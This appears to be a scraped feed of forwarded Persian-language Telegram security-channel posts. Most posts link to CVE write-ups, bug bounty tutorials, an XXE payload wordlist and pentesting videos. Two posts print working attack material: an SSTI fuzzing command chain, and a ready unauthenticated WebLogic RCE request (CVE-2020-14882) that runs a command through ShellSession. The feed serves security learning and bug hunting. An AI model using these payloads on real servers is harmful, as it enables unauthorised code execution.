Forwarded from امنیت اطلاعات
Forwarded from امنیت اطلاعات
باگ RCE در Pulse Secure پس از احراز هویت
https://www.gosecure.net/blog/2020/08/26/forget-your-perimeter-rce-in-pulse-connect-secure/
CVE-2020-8218
#rce
#pulse
#network
@sec_nerd
https://www.gosecure.net/blog/2020/08/26/forget-your-perimeter-rce-in-pulse-connect-secure/
CVE-2020-8218
#rce
#pulse
#network
@sec_nerd
Forwarded from امنیت اطلاعات
Forwarded from امنیت اطلاعات
https://twitter.com/MrDamanSingh/status/1317042176337932291?s=20
https://twitter.com/nullenc0de/status/1317195661377503232?s=20
#ssti
#pentest
@sec_nerd
https://twitter.com/nullenc0de/status/1317195661377503232?s=20
#ssti
#pentest
@sec_nerd
Twitter
Damanpreet Singh🇮🇳
Got RCE in 2 minutes via SSTI, ~waybackurls https://t.co/DC4dDq3TjO | qsreplace "daman{{9*9}}" > fuzz.txt ~ffuf -u FUZZ -w fuzz.txt -replay-proxy https://127.0.0.1:8080/ (captured requests in burp) searched: daman81 in burp, got 43 results from 1266 requests…
Tutorials and Things to Do while Hunting Vulnerability.
https://github.com/KathanP19/HowToHunt
#BugBounty
#BugBountyTip
@web_priv8
https://github.com/KathanP19/HowToHunt
#BugBounty
#BugBountyTip
@web_priv8
GitHub
GitHub - KathanP19/HowToHunt: Collection of methodology and test case for various web vulnerabilities.
Collection of methodology and test case for various web vulnerabilities. - KathanP19/HowToHunt
Forwarded from امنیت اطلاعات
باگ RCE در اپلیکیشن discord
masatokinugawa.l0.cm/2020/10/discord-desktop-rce.html (日本語)
https://mksben.l0.cm/2020/10/discord-desktop-rce.html (English)
https://youtube.com/watch?v=0f3RrvC-zGI (DEMO)
#discord
#rce
@sec_nerd
masatokinugawa.l0.cm/2020/10/discord-desktop-rce.html (日本語)
https://mksben.l0.cm/2020/10/discord-desktop-rce.html (English)
https://youtube.com/watch?v=0f3RrvC-zGI (DEMO)
#discord
#rce
@sec_nerd
mksben.l0.cm
Discord Desktop app RCE
A few months ago, I discovered a remote code execution issue in the Discord desktop application and I reported it via their Bug Bounty Prog...
Forwarded from امنیت اطلاعات
hacking android apps with frida
https://www.youtube.com/watch?v=iMNs8YAy6pk
#frida
#android
#pentest
@sec_nerd
https://www.youtube.com/watch?v=iMNs8YAy6pk
#frida
#android
#pentest
@sec_nerd
YouTube
Hacking Android Apps with Frida
Recording from Meta's security conference 2020 - Enjoy
Forwarded from امنیت اطلاعات
ورد لیست برای بروت فورس xxe
https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf
#xxe
#pentest
@sec_nerd
https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf
#xxe
#pentest
@sec_nerd
Gist
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder - xxe-payloads.txt
Forwarded from digMeMore (r00t98)
مقاله ای در خصوص باگ بانتی برای دوستانی که تازه وارد این حوزه شدن و نیاز به درک مفاهیم دارن, پیشنهاد میکنم بخونید نکات خوبی داره.
https://medium.com/bountynuggets/understanding-the-bug-bounty-game-bug-bounty-nuggets-65f565273013
#BugBounty
@digmemore
https://medium.com/bountynuggets/understanding-the-bug-bounty-game-bug-bounty-nuggets-65f565273013
#BugBounty
@digmemore
Medium
Understanding the Bug Bounty game — Bug Bounty Nuggets
Bug bounties is an upcoming trend nowadays. Hackers are paid legally to hack companies and getting paid from them. Many newcomers are…
Static Analysis of Client-Side JavaScript for pen testers and bug bounty hunters
https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288
#JS
#BugBounty
#BugBountyTip
@web_priv8
https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288
#JS
#BugBounty
#BugBountyTip
@web_priv8
Forwarded from امنیت اطلاعات
آسیب پذیری عجیب Tiki Wiki Cms Groupware
CVE-2020-15906
https://github.com/S1lkys/CVE-2020-15906
بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!
#web
#pentest
#writeup
@sec_nerd
CVE-2020-15906
https://github.com/S1lkys/CVE-2020-15906
بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!
#web
#pentest
#writeup
@sec_nerd
Forwarded from digMeMore (r00t98)
مجبور کردن فایرفاکس به اجرای XSS در ریدایرکت های 302
https://www.gremwell.com/firefox-xss-302
#XSS
#OpenRedirect
#BugBountyTip
@web_priv8
https://www.gremwell.com/firefox-xss-302
#XSS
#OpenRedirect
#BugBountyTip
@web_priv8
کارهای خفنی که با Open Redirect میشه انجام داد.
https://blog.detectify.com/2019/05/16/the-real-impact-of-an-open-redirect/
#OpenRedirect
#BugBountyTip
@web_priv8
https://blog.detectify.com/2019/05/16/the-real-impact-of-an-open-redirect/
#OpenRedirect
#BugBountyTip
@web_priv8
Blog Detectify
The real impact of an Open Redirect vulnerability - Blog Detectify
This article shows when open redirect is considered harmful, it's impact, and how it could lead to attacks like SSRF.
Forwarded from امنیت اطلاعات
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت
CVE-2020–14882
https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@sec_nerd
بدون نیاز به احراز هویت
CVE-2020–14882
https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@sec_nerd